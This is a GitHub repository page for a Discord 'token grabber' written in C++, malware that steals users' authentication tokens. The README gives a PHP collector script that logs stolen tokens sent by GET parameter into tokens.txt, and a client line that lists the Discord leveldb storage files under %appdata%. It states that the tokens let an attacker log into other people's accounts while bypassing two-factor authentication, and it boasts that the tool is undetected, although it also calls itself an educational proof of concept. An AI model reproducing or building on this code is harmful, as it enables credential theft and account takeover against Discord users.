Skip to content

bdesvc/token-grabber

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

20 Commits
 
 
 
 
 
 

Repository files navigation

Discord Token Grabber

A Discord token grabber written in C++.

This is a "token" or authorization key finder for the platform "Discord".

You can use "tokens" to login to other people's accounts with the authorization key bypassing 2fa.

Web

The web code is very basic and tokens can be accessed by anyone so I would recommend changing it.

<?php

if(isset($_GET["t"])){
	$file = fopen("tokens.txt", "a");

	$content = file_get_contents("tokens.txt");

	if(strpos($content, $_GET["t"]) === false){
		fwrite($file, $_GET["t"].'\n');
	}
	fclose($file);
}

?>

Client

This code is not very well written as I'm using C++/14 and filesystem is still experimental. As you can see here it's a hardcoded solution but it works fine for this purpose.

auto files = split(exec("cd %appdata%/discord/Local Storage/leveldb && dir /n /b *"), "\n");

Usage

This is illegal to use and is only a proof of concept since i haven't seen a C++ token grabber. I do not condone use or distribution of it!

Detection

Since it's fresh and not copied it is currently undetected

Detection

Educational Purposes

Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for"fair use" for purposes such as criticism, comment,news reporting,teaching scholarship, and research. Fair use is a use permitted by copyright statute that might otherwise be infringing. Non-profit, educational or personal use tips the balance in favor of fair use."

About

A discord token grabber written in C++

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published